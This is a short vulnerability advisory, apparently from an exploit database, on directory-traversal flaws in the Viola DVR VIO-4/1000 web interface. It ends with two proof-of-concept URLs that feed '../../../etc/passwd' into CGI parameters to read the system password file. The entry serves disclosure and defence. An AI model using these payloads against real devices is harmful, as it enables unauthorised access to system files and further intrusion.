Viola DVR VIO-4/1000 - Multiple Directory Traversal Vulnerabilities



EKU-ID: 40246 CVE: OSVDB-ID:
Author: QSecure Published: 2011-04-19 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


source: https://www.securityfocus.com/bid/47509/info

Viola DVR is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting the issues can allow an attacker to obtain sensitive information that could aid in further attacks.

Viola DVR VIO-4/1000 is vulnerable; other products may also be affected.

http://www.example.com/cgi-bin/wappwd?FILEFAIL=../../../etc/passwd
http://www.example.com/cgi-bin/wapopen?FILECAMERA=../../../etc/passwd